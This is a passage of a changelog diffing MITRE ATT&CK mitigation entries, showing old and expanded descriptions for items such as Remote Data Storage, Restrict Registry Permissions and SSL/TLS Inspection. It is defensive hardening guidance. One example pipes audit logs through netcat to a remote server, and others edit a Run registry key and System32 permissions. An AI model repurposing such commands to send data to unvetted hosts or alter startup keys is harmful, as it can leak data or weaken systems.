Anti-Injection and Memory Protection:
- Enable Control Flow Guard (CFG), DEP, and ASLR to protect against process memory tampering.
- Deploy endpoint protection tools that actively block process injection attempts.
Code Signing Validation:
- Implement policies for Windows Defender Application Control (WDAC) or AppLocker to enforce execution of signed binaries.
- Ensure critical processes are signed with valid certificates.
Access Controls:
- Use DACLs and MIC to limit which users and processes can interact with privileged processes.
- Disable unnecessary debugging capabilities for high-privileged processes.
Kernel-Level Protections:
- Ensure Kernel Patch Protection (PatchGuard) is enabled on Windows systems.
- Leverage SELinux or AppArmor on Linux to enforce kernel-level security policies.
*Tools for Implementation*
Protected Process Light (PPL):
- RunAsPPL (Windows)
- Windows Defender Credential Guard
Code Integrity and Signing:
- Windows Defender Application Control (WDAC)
- AppLocker
- SELinux/AppArmor (Linux)
Memory Protection:
- Control Flow Guard (CFG), Data Execution Prevention (DEP), ASLR
Process Isolation/Sandboxing:
- Firejail (Linux Sandbox)
- Windows Sandbox
- QEMU/KVM-based isolation
Kernel Protection:
- PatchGuard (Windows Kernel Patch Protection)
- SELinux (Mandatory Access Control for Linux)
- AppArmor |
| x_mitre_version | 1.1 | 1.2 |
[M1029] Remote Data Storage
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Use remote security log and sensitive file storage where acc | t | Remote Data Storage focuses on moving critical data, such as |
| ess can be controlled better to prevent exposure of intrusio | | security logs and sensitive files, to secure, off-host loca |
| n detection log data or sensitive information. | | tions to minimize unauthorized access, tampering, or destruc |
| | | tion by adversaries. By leveraging remote storage solutions, |
| | | organizations enhance the protection of forensic evidence, |
| | | sensitive information, and monitoring data. This mitigation |
| | | can be implemented through the following measures: Centrali |
| | | zed Log Management: - Configure endpoints to forward securi |
| | | ty logs to a centralized log collector or SIEM. - Use tools |
| | | like Splunk Graylog, or Security Onion to aggregate and stor |
| | | e logs. - Example command (Linux): `sudo auditd | tee /var/l |
| | | og/audit/audit.log | nc <remote-log-server> 514` Remote Fil |
| | | e Storage Solutions: - Utilize cloud storage solutions like |
| | | AWS S3, Google Cloud Storage, or Azure Blob Storage for sen |
| | | sitive data. - Ensure proper encryption at rest and access c |
| | | ontrol policies (IAM roles, ACLs). Intrusion Detection Log |
| | | Forwarding: - Forward logs from IDS/IPS systems (e.g., Zeek |
| | | /Suricata) to a remote security information system. - Exampl |
| | | e for Suricata log forwarding: `outputs: - type: syslog |
| | | protocol: tls address: <remote-syslog-server>` Immuta |
| | | ble Backup Configurations: - Enable immutable storage setti |
| | | ngs for backups to prevent adversaries from modifying or del |
| | | eting data. - Example: AWS S3 Object Lock. Data Encryption: |
| | | - Ensure encryption for sensitive data using AES-256 at re |
| | | st and TLS 1.2+ for data in transit. Tools: OpenSSL, BitLock |
| | | er, LUKS for Linux. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-06-06 21:21:13.027000+00:00 | 2024-12-18 19:03:10.800000+00:00 |
| description | Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information. | Remote Data Storage focuses on moving critical data, such as security logs and sensitive files, to secure, off-host locations to minimize unauthorized access, tampering, or destruction by adversaries. By leveraging remote storage solutions, organizations enhance the protection of forensic evidence, sensitive information, and monitoring data. This mitigation can be implemented through the following measures:
Centralized Log Management:
- Configure endpoints to forward security logs to a centralized log collector or SIEM.
- Use tools like Splunk Graylog, or Security Onion to aggregate and store logs.
- Example command (Linux): `sudo auditd | tee /var/log/audit/audit.log | nc 514`
Remote File Storage Solutions:
- Utilize cloud storage solutions like AWS S3, Google Cloud Storage, or Azure Blob Storage for sensitive data.
- Ensure proper encryption at rest and access control policies (IAM roles, ACLs).
Intrusion Detection Log Forwarding:
- Forward logs from IDS/IPS systems (e.g., Zeek/Suricata) to a remote security information system.
- Example for Suricata log forwarding:
`outputs:
- type: syslog
protocol: tls
address: `
Immutable Backup Configurations:
- Enable immutable storage settings for backups to prevent adversaries from modifying or deleting data.
- Example: AWS S3 Object Lock.
Data Encryption:
- Ensure encryption for sensitive data using AES-256 at rest and TLS 1.2+ for data in transit.
Tools: OpenSSL, BitLocker, LUKS for Linux. |
| x_mitre_version | 1.0 | 1.1 |
[M1022] Restrict File and Directory Permissions
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Restrict access by setting directory and file permissions th | t | Restricting file and directory permissions involves setting |
| at are not specific to users or privileged accounts. | | access controls at the file system level to limit which user |
| | | s, groups, or processes can read, write, or execute files. B |
| | | y configuring permissions appropriately, organizations can r |
| | | educe the attack surface for adversaries seeking to access s |
| | | ensitive data, plant malicious code, or tamper with system f |
| | | iles. Enforce Least Privilege Permissions: - Remove unnece |
| | | ssary write permissions on sensitive files and directories. |
| | | - Use file ownership and groups to control access for specif |
| | | ic roles. Example (Windows): Right-click the shared folder |
| | | → Properties → Security tab → Adjust permissions for NTFS AC |
| | | Ls. Harden File Shares: - Disable anonymous access to shar |
| | | ed folders. - Enforce NTFS permissions for shared folders on |
| | | Windows. Example: Set permissions to restrict write access |
| | | to critical files, such as system executables (e.g., `/bin` |
| | | or `/sbin` on Linux). Use tools like `chown` and `chmod` to |
| | | assign file ownership and limit access. On Linux, apply: ` |
| | | chmod 750 /etc/sensitive.conf` `chown root:admin /etc/sensit |
| | | ive.conf` File Integrity Monitoring (FIM): - Use tools lik |
| | | e Tripwire, Wazuh, or OSSEC to monitor changes to critical f |
| | | ile permissions. Audit File System Access: - Enable auditi |
| | | ng to track permission changes or unauthorized access attemp |
| | | ts. - Use auditd (Linux) or Event Viewer (Windows) to log ac |
| | | tivities. Restrict Startup Directories: - Configure permis |
| | | sions to prevent unauthorized writes to directories like `C: |
| | | \ProgramData\Microsoft\Windows\Start Menu`. Example: Restri |
| | | ct write access to critical directories like `/etc/`, `/usr/ |
| | | local/`, and Windows directories such as `C:\Windows\System3 |
| | | 2`. - On Windows, use icacls to modify permissions: `icacls |
| | | "C:\Windows\System32" /inheritance:r /grant:r SYSTEM:(OI)(C |
| | | I)F` - On Linux, monitor permissions using tools like `lsatt |
| | | r` or `auditd`. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-20 15:12:39.136000+00:00 | 2024-12-18 19:18:58.856000+00:00 |
| description | Restrict access by setting directory and file permissions that are not specific to users or privileged accounts. | Restricting file and directory permissions involves setting access controls at the file system level to limit which users, groups, or processes can read, write, or execute files. By configuring permissions appropriately, organizations can reduce the attack surface for adversaries seeking to access sensitive data, plant malicious code, or tamper with system files.
Enforce Least Privilege Permissions:
- Remove unnecessary write permissions on sensitive files and directories.
- Use file ownership and groups to control access for specific roles.
Example (Windows): Right-click the shared folder → Properties → Security tab → Adjust permissions for NTFS ACLs.
Harden File Shares:
- Disable anonymous access to shared folders.
- Enforce NTFS permissions for shared folders on Windows.
Example: Set permissions to restrict write access to critical files, such as system executables (e.g., `/bin` or `/sbin` on Linux). Use tools like `chown` and `chmod` to assign file ownership and limit access.
On Linux, apply:
`chmod 750 /etc/sensitive.conf`
`chown root:admin /etc/sensitive.conf`
File Integrity Monitoring (FIM):
- Use tools like Tripwire, Wazuh, or OSSEC to monitor changes to critical file permissions.
Audit File System Access:
- Enable auditing to track permission changes or unauthorized access attempts.
- Use auditd (Linux) or Event Viewer (Windows) to log activities.
Restrict Startup Directories:
- Configure permissions to prevent unauthorized writes to directories like `C:\ProgramData\Microsoft\Windows\Start Menu`.
Example: Restrict write access to critical directories like `/etc/`, `/usr/local/`, and Windows directories such as `C:\Windows\System32`.
- On Windows, use icacls to modify permissions: `icacls "C:\Windows\System32" /inheritance:r /grant:r SYSTEM:(OI)(CI)F`
- On Linux, monitor permissions using tools like `lsattr` or `auditd`. |
| x_mitre_version | 1.1 | 1.2 |
[M1044] Restrict Library Loading
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Prevent abuse of library loading mechanisms in the operating | t | Restricting library loading involves implementing security c |
| system and software to load untrusted code by configuring a | | ontrols to ensure that only trusted and verified libraries ( |
| ppropriate library loading mechanisms and investigating pote | | DLLs, shared objects, etc.) are loaded into processes. Adver |
| ntial vulnerable software. | | saries often abuse Dynamic-Link Library (DLL) Injection, DLL |
| | | Search Order Hijacking, or LD_PRELOAD mechanisms to execute |
| | | malicious code by forcing the operating system to load untr |
| | | usted libraries. This mitigation can be implemented through |
| | | the following measures: Enforce Safe Library Loading Pract |
| | | ices: - Enable `SafeDLLSearchMode` on Windows. - Restrict ` |
| | | LD_PRELOAD` and `LD_LIBRARY_PATH` usage on Linux systems. C |
| | | ode Signing Enforcement: - Require digital signatures for a |
| | | ll libraries loaded into processes. - Use tools like Signtoo |
| | | l, and WDAC to enforce signed DLL execution. Environment Ha |
| | | rdening: - Secure library paths and directories to prevent |
| | | adversaries from placing rogue libraries. - Monitor user-wri |
| | | table directories and system configurations for unauthorized |
| | | changes. Audit and Monitor Library Loading: - Enable `Sys |
| | | mon` on Windows to monitor for suspicious library loads. - U |
| | | se `auditd` on Linux to monitor shared library paths and con |
| | | figuration file changes. Use Application Control Solutions: |
| | | - Implement AppLocker, WDAC, or SELinux to allow only trus |
| | | ted libraries. *Tools for Implementation* Windows-Specific |
| | | Tools: - AppLocker: Application whitelisting for DLLs. - W |
| | | indows Defender Application Control (WDAC): Restrict unautho |
| | | rized library execution. - Signtool: Verify and enforce code |
| | | signing. - Sysmon: Monitor DLL load events (Event ID 7). L |
| | | inux-Specific Tools: - auditd: Monitor changes to library p |
| | | aths and critical files. - SELinux/AppArmor: Define policies |
| | | to restrict library loading. - ldconfig and chattr: Secure |
| | | LD configuration files and prevent unauthorized modification |
| | | s. Cross-Platform Solutions: - Wazuh or OSSEC: File integr |
| | | ity monitoring for library changes. - Tripwire: Detect and a |
| | | lert on unauthorized library modifications. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-06-11 17:00:01.740000+00:00 | 2024-12-18 20:22:48.602000+00:00 |
| description | Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software. | Restricting library loading involves implementing security controls to ensure that only trusted and verified libraries (DLLs, shared objects, etc.) are loaded into processes. Adversaries often abuse Dynamic-Link Library (DLL) Injection, DLL Search Order Hijacking, or LD_PRELOAD mechanisms to execute malicious code by forcing the operating system to load untrusted libraries. This mitigation can be implemented through the following measures:
Enforce Safe Library Loading Practices:
- Enable `SafeDLLSearchMode` on Windows.
- Restrict `LD_PRELOAD` and `LD_LIBRARY_PATH` usage on Linux systems.
Code Signing Enforcement:
- Require digital signatures for all libraries loaded into processes.
- Use tools like Signtool, and WDAC to enforce signed DLL execution.
Environment Hardening:
- Secure library paths and directories to prevent adversaries from placing rogue libraries.
- Monitor user-writable directories and system configurations for unauthorized changes.
Audit and Monitor Library Loading:
- Enable `Sysmon` on Windows to monitor for suspicious library loads.
- Use `auditd` on Linux to monitor shared library paths and configuration file changes.
Use Application Control Solutions:
- Implement AppLocker, WDAC, or SELinux to allow only trusted libraries.
*Tools for Implementation*
Windows-Specific Tools:
- AppLocker: Application whitelisting for DLLs.
- Windows Defender Application Control (WDAC): Restrict unauthorized library execution.
- Signtool: Verify and enforce code signing.
- Sysmon: Monitor DLL load events (Event ID 7).
Linux-Specific Tools:
- auditd: Monitor changes to library paths and critical files.
- SELinux/AppArmor: Define policies to restrict library loading.
- ldconfig and chattr: Secure LD configuration files and prevent unauthorized modifications.
Cross-Platform Solutions:
- Wazuh or OSSEC: File integrity monitoring for library changes.
- Tripwire: Detect and alert on unauthorized library modifications. |
| x_mitre_version | 1.0 | 1.1 |
[M1024] Restrict Registry Permissions
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Restrict the ability to modify certain hives or keys in the | t | Restricting registry permissions involves configuring access |
| Windows Registry. | | control settings for sensitive registry keys and hives to e |
| | | nsure that only authorized users or processes can make modif |
| | | ications. By limiting access, organizations can prevent unau |
| | | thorized changes that adversaries might use for persistence, |
| | | privilege escalation, or defense evasion. This mitigation c |
| | | an be implemented through the following measures: Review an |
| | | d Adjust Permissions on Critical Keys - Regularly review pe |
| | | rmissions on keys such as `Run`, `RunOnce`, and `Services` t |
| | | o ensure only authorized users have write access. - Use tool |
| | | s like `icacls` or `PowerShell` to automate permission adjus |
| | | tments. Enable Registry Auditing - Enable auditing on sens |
| | | itive keys to log access attempts. - Use Event Viewer or SIE |
| | | M solutions to analyze logs and detect suspicious activity. |
| | | - Example Audit Policy: `auditpol /set /subcategory:"Registr |
| | | y" /success:enable /failure:enable` Protect Credential-Rela |
| | | ted Hives - Limit access to hives like `SAM`,`SECURITY`, an |
| | | d `SYSTEM` to prevent credential dumping or other unauthoriz |
| | | ed access. - Use LSA Protection to add an additional securit |
| | | y layer for credential storage. Restrict Registry Editor Us |
| | | age - Use Group Policy to restrict access to regedit.exe fo |
| | | r non-administrative users. - Block execution of registry ed |
| | | iting tools on endpoints where they are unnecessary. Deploy |
| | | Baseline Configuration Tools - Use tools like Microsoft Se |
| | | curity Compliance Toolkit or CIS Benchmarks to apply and mai |
| | | ntain secure registry configurations. *Tools for Implementa |
| | | tion* Registry Permission Tools: - Registry Editor (reged |
| | | it): Built-in tool to manage registry permissions. - PowerSh |
| | | ell: Automate permissions and manage keys. `Set-ItemProperty |
| | | -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" |
| | | -Name "KeyName" -Value "Value"` - icacls: Command-line tool |
| | | to modify ACLs. Monitoring Tools: - Sysmon: Monitor and l |
| | | og registry events. - Event Viewer: View registry access log |
| | | s. Policy Management Tools: - Group Policy Management Cons |
| | | ole (GPMC): Enforce registry permissions via GPOs. - Microso |
| | | ft Endpoint Manager: Deploy configuration baselines for regi |
| | | stry permissions. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-31 17:12:06.164000+00:00 | 2024-12-24 13:34:49.309000+00:00 |
| description | Restrict the ability to modify certain hives or keys in the Windows Registry. | Restricting registry permissions involves configuring access control settings for sensitive registry keys and hives to ensure that only authorized users or processes can make modifications. By limiting access, organizations can prevent unauthorized changes that adversaries might use for persistence, privilege escalation, or defense evasion. This mitigation can be implemented through the following measures:
Review and Adjust Permissions on Critical Keys
- Regularly review permissions on keys such as `Run`, `RunOnce`, and `Services` to ensure only authorized users have write access.
- Use tools like `icacls` or `PowerShell` to automate permission adjustments.
Enable Registry Auditing
- Enable auditing on sensitive keys to log access attempts.
- Use Event Viewer or SIEM solutions to analyze logs and detect suspicious activity.
- Example Audit Policy: `auditpol /set /subcategory:"Registry" /success:enable /failure:enable`
Protect Credential-Related Hives
- Limit access to hives like `SAM`,`SECURITY`, and `SYSTEM` to prevent credential dumping or other unauthorized access.
- Use LSA Protection to add an additional security layer for credential storage.
Restrict Registry Editor Usage
- Use Group Policy to restrict access to regedit.exe for non-administrative users.
- Block execution of registry editing tools on endpoints where they are unnecessary.
Deploy Baseline Configuration Tools
- Use tools like Microsoft Security Compliance Toolkit or CIS Benchmarks to apply and maintain secure registry configurations.
*Tools for Implementation*
Registry Permission Tools:
- Registry Editor (regedit): Built-in tool to manage registry permissions.
- PowerShell: Automate permissions and manage keys. `Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "KeyName" -Value "Value"`
- icacls: Command-line tool to modify ACLs.
Monitoring Tools:
- Sysmon: Monitor and log registry events.
- Event Viewer: View registry access logs.
Policy Management Tools:
- Group Policy Management Console (GPMC): Enforce registry permissions via GPOs.
- Microsoft Endpoint Manager: Deploy configuration baselines for registry permissions. |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[M1021] Restrict Web-Based Content
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Restrict use of certain websites, block downloads/attachment | t | Restricting web-based content involves enforcing policies an |
| s, block Javascript, restrict browser extensions, etc. | | d technologies that limit access to potentially malicious we |
| | | bsites, unsafe downloads, and unauthorized browser behaviors |
| | | . This can include URL filtering, download restrictions, scr |
| | | ipt blocking, and extension control to protect against explo |
| | | itation, phishing, and malware delivery. This mitigation can |
| | | be implemented through the following measures: Deploy Web |
| | | Proxy Filtering: - Use solutions to filter web traffic base |
| | | d on categories, reputation, and content types. - Enforce po |
| | | licies that block unsafe websites or file types at the gatew |
| | | ay level. Enable DNS-Based Filtering: - Implement tools to |
| | | restrict access to domains associated with malware or phish |
| | | ing campaigns. - Use public DNS filtering services to enhanc |
| | | e protection. Enforce Content Security Policies (CSP): - C |
| | | onfigure CSP headers on internal and external web applicatio |
| | | ns to restrict script execution, iframe embedding, and cross |
| | | -origin requests. Control Browser Features: - Disable unap |
| | | proved browser features like automatic downloads, developer |
| | | tools, or unsafe scripting. - Enforce policies through tools |
| | | like Group Policy Management to control browser settings. |
| | | Monitor and Alert on Web-Based Threats: - Use SIEM tools to |
| | | collect and analyze web proxy logs for signs of anomalous o |
| | | r malicious activity. - Configure alerts for access attempts |
| | | to blocked domains or repeated file download failures. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-06-06 20:52:59.206000+00:00 | 2024-12-24 13:40:41.043000+00:00 |
| description | Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc. | Restricting web-based content involves enforcing policies and technologies that limit access to potentially malicious websites, unsafe downloads, and unauthorized browser behaviors. This can include URL filtering, download restrictions, script blocking, and extension control to protect against exploitation, phishing, and malware delivery. This mitigation can be implemented through the following measures:
Deploy Web Proxy Filtering:
- Use solutions to filter web traffic based on categories, reputation, and content types.
- Enforce policies that block unsafe websites or file types at the gateway level.
Enable DNS-Based Filtering:
- Implement tools to restrict access to domains associated with malware or phishing campaigns.
- Use public DNS filtering services to enhance protection.
Enforce Content Security Policies (CSP):
- Configure CSP headers on internal and external web applications to restrict script execution, iframe embedding, and cross-origin requests.
Control Browser Features:
- Disable unapproved browser features like automatic downloads, developer tools, or unsafe scripting.
- Enforce policies through tools like Group Policy Management to control browser settings.
Monitor and Alert on Web-Based Threats:
- Use SIEM tools to collect and analyze web proxy logs for signs of anomalous or malicious activity.
- Configure alerts for access attempts to blocked domains or repeated file download failures. |
| x_mitre_version | 1.0 | 1.1 |
[M1020] SSL/TLS Inspection
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Break and inspect SSL/TLS sessions to look at encrypted web | t | SSL/TLS inspection involves decrypting encrypted network tra |
| traffic for adversary activity. | | ffic to examine its content for signs of malicious activity. |
| | | This capability is crucial for detecting threats that use e |
| | | ncryption to evade detection, such as phishing, malware, or |
| | | data exfiltration. After inspection, the traffic is re-encry |
| | | pted and forwarded to its destination. This mitigation can b |
| | | e implemented through the following measures: Deploy SSL/TL |
| | | S Inspection Appliances: - Implement SSL/TLS inspection sol |
| | | utions to decrypt and inspect encrypted traffic. - Ensure ap |
| | | pliances are placed at critical network choke points for max |
| | | imum coverage. Configure Decryption Policies: - Define rul |
| | | es to decrypt traffic for specific applications, ports, or d |
| | | omains. - Avoid decrypting sensitive or privacy-related traf |
| | | fic, such as financial or healthcare websites, to comply wit |
| | | h regulations. Integrate Threat Intelligence: - Use threat |
| | | intelligence feeds to correlate inspected traffic with know |
| | | n indicators of compromise (IOCs). Integrate with Security |
| | | Tools: - Combine SSL/TLS inspection with SIEM and NDR tools |
| | | to analyze decrypted traffic and generate alerts for suspic |
| | | ious activity. - Example Tools: Splunk, Darktrace Implement |
| | | Certificate Management: - Use trusted internal or third-pa |
| | | rty certificates for traffic re-encryption after inspection. |
| | | - Regularly update certificate authorities (CAs) to ensure |
| | | secure re-encryption. Monitor and Tune: - Continuously mon |
| | | itor SSL/TLS inspection logs for anomalies and fine-tune pol |
| | | icies to reduce false positives. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-06-06 20:15:34.146000+00:00 | 2024-12-24 13:46:05.302000+00:00 |
| description | Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity. | SSL/TLS inspection involves decrypting encrypted network traffic to examine its content for signs of malicious activity. This capability is crucial for detecting threats that use encryption to evade detection, such as phishing, malware, or data exfiltration. After inspection, the traffic is re-encrypted and forwarded to its destination. This mitigation can be implemented through the following measures:
Deploy SSL/TLS Inspection Appliances:
- Implement SSL/TLS inspection solutions to decrypt and inspect encrypted traffic.
- Ensure appliances are placed at critical network choke points for maximum coverage.
Configure Decryption Policies:
- Define rules to decrypt traffic for specific applications, ports, or domains.
- Avoid decrypting sensitive or privacy-related traffic, such as financial or healthcare websites, to comply with regulations.
Integrate Threat Intelligence:
- Use threat intelligence feeds to correlate inspected traffic with known indicators of compromise (IOCs).
Integrate with Security Tools:
- Combine SSL/TLS inspection with SIEM and NDR tools to analyze decrypted traffic and generate alerts for suspicious activity.
- Example Tools: Splunk, Darktrace
Implement Certificate Management:
- Use trusted internal or third-party certificates for traffic re-encryption after inspection.
- Regularly update certificate authorities (CAs) to ensure secure re-encryption.
Monitor and Tune:
- Continuously monitor SSL/TLS inspection logs for anomalies and fine-tune policies to reduce false positives. |
| x_mitre_version | 1.0 | 1.1 |
[M1054] Software Configuration
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Implement configuration changes to software (other than the | t | Software configuration refers to making security-focused adj |
| operating system) to mitigate security risks associated to h | | ustments to the settings of applications, middleware, databa |
| ow the software operates. | | ses, or other software to mitigate potential threats. These |
| | | changes help reduce the attack surface, enforce best practic |
| | | es, and protect sensitive data. This mitigation can be imple |
| | | mented through the following measures: Conduct a Security R |
| | | eview of Application Settings: - Review the software docume |
| | | ntation to identify recommended security configurations. - C |
| | | ompare default settings against organizational policies and |
| | | compliance requirements. Implement Access Controls and Perm |
| | | issions: - Restrict access to sensitive features or data wi |
| | | thin the software. - Enforce least privilege principles for |
| | | all roles and accounts interacting with the software. Enabl |
| | | e Logging and Monitoring: - Configure detailed logging for |
| | | key application events such as authentication failures, conf |
| | | iguration changes, or unusual activity. - Integrate logs wit |
| | | h a centralized monitoring solution, such as a SIEM. Update |
| | | and Patch Software Regularly: - Ensure the software is kep |
| | | t up-to-date with the latest security patches to address kno |
| | | wn vulnerabilities. - Use automated patch management tools t |
| | | o streamline the update process. Disable Unnecessary Featur |
| | | es or Services: - Turn off unused functionality or componen |
| | | ts that could introduce vulnerabilities, such as debugging i |
| | | nterfaces or deprecated APIs. Test Configuration Changes: |
| | | - Perform configuration changes in a staging environment bef |
| | | ore applying them in production. - Conduct regular audits to |
| | | ensure that settings remain aligned with security policies. |
| | | *Tools for Implementation* Configuration Management Tools |
| | | : - Ansible: Automates configuration changes across multipl |
| | | e applications and environments. - Chef: Ensures consistent |
| | | application settings through code-based configuration manage |
| | | ment. - Puppet: Automates software configurations and audits |
| | | changes for compliance. Security Benchmarking Tools: - CI |
| | | S-CAT: Provides benchmarks and audits for secure software co |
| | | nfigurations. - Aqua Security Trivy: Scans containerized app |
| | | lications for configuration issues. Vulnerability Managemen |
| | | t Solutions: - Nessus: Identifies misconfigurations and sug |
| | | gests corrective actions. Logging and Monitoring Tools: - |
| | | Splunk: Aggregates and analyzes application logs to detect s |
| | | uspicious activity. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-12-26 19:17:13.293000+00:00 | 2024-12-24 14:02:11.579000+00:00 |
| description | Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates. | Software configuration refers to making security-focused adjustments to the settings of applications, middleware, databases, or other software to mitigate potential threats. These changes help reduce the attack surface, enforce best practices, and protect sensitive data. This mitigation can be implemented through the following measures:
Conduct a Security Review of Application Settings:
- Review the software documentation to identify recommended security configurations.
- Compare default settings against organizational policies and compliance requirements.
Implement Access Controls and Permissions:
- Restrict access to sensitive features or data within the software.
- Enforce least privilege principles for all roles and accounts interacting with the software.
Enable Logging and Monitoring:
- Configure detailed logging for key application events such as authentication failures, configuration changes, or unusual activity.
- Integrate logs with a centralized monitoring solution, such as a SIEM.
Update and Patch Software Regularly:
- Ensure the software is kept up-to-date with the latest security patches to address known vulnerabilities.
- Use automated patch management tools to streamline the update process.
Disable Unnecessary Features or Services:
- Turn off unused functionality or components that could introduce vulnerabilities, such as debugging interfaces or deprecated APIs.
Test Configuration Changes:
- Perform configuration changes in a staging environment before applying them in production.
- Conduct regular audits to ensure that settings remain aligned with security policies.
*Tools for Implementation*
Configuration Management Tools:
- Ansible: Automates configuration changes across multiple applications and environments.
- Chef: Ensures consistent application settings through code-based configuration management.
- Puppet: Automates software configurations and audits changes for compliance.
Security Benchmarking Tools:
- CIS-CAT: Provides benchmarks and audits for secure software configurations.
- Aqua Security Trivy: Scans containerized applications for configuration issues.
Vulnerability Management Solutions:
- Nessus: Identifies misconfigurations and suggests corrective actions.
Logging and Monitoring Tools:
- Splunk: Aggregates and analyzes application logs to detect suspicious activity. |
| x_mitre_version | 1.2 | 1.3 |
[M1019] Threat Intelligence Program
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | A threat intelligence program helps an organization generate | t | A Threat Intelligence Program enables organizations to proac |
| their own threat intelligence information and track trends | | tively identify, analyze, and act on cyber threats by levera |
| to inform defensive priorities to mitigate risk. | | ging internal and external data sources. The program support |
| | | s decision-making processes, prioritizes defenses, and impro |
| | | ves incident response by delivering actionable intelligence |
| | | tailored to the organization's risk profile and operational |
| | | environment. This mitigation can be implemented through the |
| | | following measures: Establish a Threat Intelligence Team: |
| | | - Form a dedicated team or assign responsibility to existing |
| | | security personnel to collect, analyze, and act on threat i |
| | | ntelligence. Define Intelligence Requirements: - Identify |
| | | the organization’s critical assets and focus intelligence ga |
| | | thering efforts on threats targeting these assets. Leverage |
| | | Internal and External Data Sources: - Collect intelligence |
| | | from internal sources such as logs, incidents, and alerts. |
| | | Subscribe to external threat intelligence feeds, participate |
| | | in ISACs, and monitor open-source intelligence (OSINT). Im |
| | | plement Tools for Automation: - Use threat intelligence pla |
| | | tforms (TIPs) to automate the collection, enrichment, and di |
| | | ssemination of threat data. - Integrate threat intelligence |
| | | with SIEMs to correlate IOCs with internal events. Analyze |
| | | and Act on Intelligence: - Use frameworks like MITRE ATT&CK |
| | | to map intelligence to adversary TTPs. - Prioritize defensi |
| | | ve measures, such as patching vulnerabilities or deploying I |
| | | OCs, based on analyzed threats. Share and Collaborate: - S |
| | | hare intelligence with industry peers through ISACs or threa |
| | | t-sharing platforms to enhance collective defense. Evaluate |
| | | and Update the Program: - Regularly assess the effectivene |
| | | ss of the threat intelligence program. - Update intelligence |
| | | priorities and capabilities as new threats emerge. *Tools |
| | | for Implementation* Threat Intelligence Platforms (TIPs): |
| | | - OpenCTI: An open-source platform for structuring and shari |
| | | ng threat intelligence. - MISP: A threat intelligence sharin |
| | | g platform for sharing structured threat data. Threat Intel |
| | | ligence Feeds: - Open Threat Exchange (OTX): Provides free |
| | | access to a large repository of threat intelligence. - CIRCL |
| | | OSINT Feed: A free source for IOCs and threat information. |
| | | Automation and Enrichment Tools: - TheHive: An open-source |
| | | incident response platform with threat intelligence integra |
| | | tion. - Yeti: A platform for managing and structuring knowle |
| | | dge about threats. Analysis Frameworks: - MITRE ATT&CK Nav |
| | | igator: A tool for mapping threat intelligence to adversary |
| | | behaviors. - Cuckoo Sandbox: Analyzes malware to extract beh |
| | | avioral indicators. Community and Collaboration Tools: - I |
| | | SAC Memberships: Join industry-specific ISACs for intelligen |
| | | ce sharing. - Slack/Discord Channels: Participate in threat |
| | | intelligence communities for real-time collaboration. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-06-06 19:55:50.927000+00:00 | 2024-12-24 14:05:21.946000+00:00 |
| description | A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk. | A Threat Intelligence Program enables organizations to proactively identify, analyze, and act on cyber threats by leveraging internal and external data sources. The program supports decision-making processes, prioritizes defenses, and improves incident response by delivering actionable intelligence tailored to the organization's risk profile and operational environment. This mitigation can be implemented through the following measures:
Establish a Threat Intelligence Team:
- Form a dedicated team or assign responsibility to existing security personnel to collect, analyze, and act on threat intelligence.
Define Intelligence Requirements:
- Identify the organization’s critical assets and focus intelligence gathering efforts on threats targeting these assets.
Leverage Internal and External Data Sources:
- Collect intelligence from internal sources such as logs, incidents, and alerts.
Subscribe to external threat intelligence feeds, participate in ISACs, and monitor open-source intelligence (OSINT).
Implement Tools for Automation:
- Use threat intelligence platforms (TIPs) to automate the collection, enrichment, and dissemination of threat data.
- Integrate threat intelligence with SIEMs to correlate IOCs with internal events.
Analyze and Act on Intelligence:
- Use frameworks like MITRE ATT&CK to map intelligence to adversary TTPs.
- Prioritize defensive measures, such as patching vulnerabilities or deploying IOCs, based on analyzed threats.
Share and Collaborate:
- Share intelligence with industry peers through ISACs or threat-sharing platforms to enhance collective defense.
Evaluate and Update the Program:
- Regularly assess the effectiveness of the threat intelligence program.
- Update intelligence priorities and capabilities as new threats emerge.
*Tools for Implementation*
Threat Intelligence Platforms (TIPs):
